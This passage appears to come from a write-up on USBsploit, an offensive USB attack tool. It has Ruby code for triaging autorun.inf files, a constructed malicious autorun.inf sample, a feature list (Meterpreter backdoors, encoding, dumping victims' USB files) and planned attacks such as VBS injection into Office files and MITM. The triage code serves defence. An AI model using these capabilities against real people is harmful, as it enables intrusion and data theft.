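  LAUNCH_KEYS.each do |key|
    next unless entries[key]
    target = entries[key].split(/\s+/).first.to_s
    note = if target.match?(/\.(exe|lnk|pdf|bat|cmd|scr|vbs|js)\z/i)
             'launches a payload file'
           else
             'launches a file'
           end
    findings << [key, entries[key], note]
  end
  # "Open folder to view files" is the wording of Explorer's own AutoPlay
  # entry; an autorun.inf that supplies it is impersonating that entry.
  if entries['action'] && entries['action'].match?(/open folder/i)
    findings << ['action', entries['action'], 'mimics the built-in Explorer entry']
  end
  findings
end

# NoDriveTypeAutoRun: bit n disables AutoRun for GetDriveType value n, so
# 0x04 covers DRIVE_REMOVABLE (USB sticks) and 0xFF disables it everywhere.
DRIVE_REMOVABLE = 2
def autorun_disabled_for?(policy_value, drive_type = DRIVE_REMOVABLE)
  policy_value[drive_type] == 1
end

# Constructed sample: the shape an Auto[run|play]/EXE infection leaves behind.
SAMPLE_AUTORUN = <<~INF
  [autorun]
  ; looks like the Windows "Open folder" entry
  action=Open folder to view files
  icon=%SystemRoot%\\system32\\SHELL32.dll,4
  open=recycler\\setup.exe
  shellexecute=docs\\readme.pdf
INF

def demo_autorun_triage
  {
    findings: autorun_findings(SAMPLE_AUTORUN).map(&:first),
    policy_0x91_blocks_usb: autorun_disabled_for?(0x91),  # bit 2 clear
    policy_0xff_blocks_usb: autorun_disabled_for?(0xFF)   # bit 2 set
  }
end

puts demo_autorun_triage.inspect if __FILE__ == $0
```

Caveat: a clean or absent autorun.inf is not proof the key is harmless. The LNK variant does not need an open= directive at all, which is exactly why the changelog describes the LNK and replacement modules as the fallback for targets with Auto[run|play] disabled.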

USBsploit V0.1b:

- Was tested on a GNU/Linux operating system with Python 2.6.2 and Ruby 1.9.1.
- Was tested against a Microsoft Windows XP PRO SP3 target running under GNU/Linux VMware Server 2.0.2.
- Needs the wmic command on the targets (Windows XP HOME is not a possible target).
- Works against multiple targets at the same time and multiple USB keys on each target.
- Handles multiple plugs and unplugs of the same key.
- Can be installed via SVN or the ".run" or ".tar.gz" archives.
- Can be managed through a Python interface (a modified version of the Social Engineering Toolkit, original by ReL1K).
- Can be updated via SVN.
- Allows enabling and disabling auto-updates.
- Allows editing the global configuration file.
- Allows generating Meterpreter backdoors with several options (listener IP, backdoor type, encoding type, listener port, number of encoding passes) and choosing whether a Dump Listener is launched.
- Allows generating Meterpreter backdoors with the same kind of options and launching a Dump Listener automatically.
- Lets you choose between 3 types of Meterpreter backdoors (Reverse_TCP, the only one tested so far, Reverse_TCP_X64, Egress Buster).
- Lets you choose between 3 types of encoding for the Meterpreter backdoors (shikata_ga_nai, Multi-Encoder, Backdoored Executable).
- Allows dumping all the files from a remote USB key through multiple Meterpreter sessions and a light version (24MB) of Metasploit (original by HDM).
- Allows dumping, from a remote USB key, all the files matching a specific set of extensions defined in a text file.
- Allows editing the file defining the set of extensions.
- Allows launching a Dump Listener from the last Dump configuration file.
- Allows editing the last Dump configuration file.
- Allows enabling the high verbosity mode.
- Allows choosing between a single successful USB Scan/Dump per attack or an infinite loop.
- Ruby script usbsploit.rb compatible with the original Metasploit Framework (all the options work with version 3.4.x; earlier versions were not tested).
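The extension-filtered dump described in the 0.1b entries (extensions read from a text file) together with the overwrite protection added to dump_usbsploit.rb in 0.5b, as an added example in plain Ruby that is not USBsploit's code. It works on a local directory tree instead of a Meterpreter session; the USB tree, the extension file and the "replaced" EXE in demo_dump are constructed in a temporary directory.

```ruby
# Added example, not USBsploit's code. Runs entirely in a temp directory.
require 'fileutils'
require 'tmpdir'

# Extension list file: one extension per line, '#' comments, case-insensitive,
# with or without the leading dot.
def load_extensions(path)
  File.readlines(path)
      .map { |l| l.sub(/#.*/, '').strip.downcase }
      .reject(&:empty?)
      .map { |e| e.start_with?('.') ? e : ".#{e}" }
end

# Copy every file under src whose extension is in exts into dst, mirroring the
# relative path. With protect: true an existing copy is never overwritten,
# which keeps a file planted on the key later (e.g. by a replacement module)
# from clobbering the original that was dumped first.
# Returns [copied, skipped] as sorted arrays of relative paths.
def dump_matching(src, dst, exts, protect: true)
  copied, skipped = [], []
  Dir.glob(File.join(src, '**', '*'), File::FNM_DOTMATCH).each do |f|
    next unless File.file?(f)
    next unless exts.include?(File.extname(f).downcase)
    rel    = f.sub(%r{\A#{Regexp.escape(src)}/?}, '')
    target = File.join(dst, rel)
    if protect && File.exist?(target)
      skipped << rel
      next
    end
    FileUtils.mkdir_p(File.dirname(target))
    FileUtils.cp(f, target)
    copied << rel
  end
  [copied.sort, skipped.sort]
end

# Constructed scenario: dump, then the EXE on the key is replaced, then dump
# again with and without protection.
def demo_dump
  Dir.mktmpdir do |root|
    usb = File.join(root, 'usb')
    out = File.join(root, 'loot')
    FileUtils.mkdir_p(File.join(usb, 'docs'))
    File.write(File.join(usb, 'docs', 'report.PDF'), 'pdf1')
    File.write(File.join(usb, 'tool.exe'), 'mz')
    File.write(File.join(usb, 'notes.txt'), 'txt')
    File.write(File.join(root, 'exts.txt'), "# dump list\npdf\n.exe\n")

    exts   = load_extensions(File.join(root, 'exts.txt'))
    first  = dump_matching(usb, out, exts)
    File.write(File.join(usb, 'tool.exe'), 'replaced')   # key now carries the planted EXE
    second = dump_matching(usb, out, exts)               # protected: originals kept
    kept   = File.read(File.join(out, 'tool.exe'))
    third  = dump_matching(usb, out, exts, protect: false) # unprotected: overwritten
    { exts: exts, first: first, second: second, loot_tool: kept,
      third: third, loot_tool_unprotected: File.read(File.join(out, 'tool.exe')) }
  end
end

puts demo_dump.inspect if __FILE__ == $0
```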

The future versions of USBsploit could:

- inject a malicious VBS script into the DOC/XLS files available on the remote USB keys,
- target U3 USB keys,
- integrate the ReverseConnectRetries directive for the Reverse_TCP payloads,
- integrate the EnableContextEncoding and ContextInformationFile directives for payload generation,
- reintegrate some SET features to spread the malicious files,
- help to build a fake malicious website feeding a Twitter account with items from the most popular press RSS feeds. Karmetasploit, Wepbuster, MITM and ARP poisoning modules could also be added,
- others?

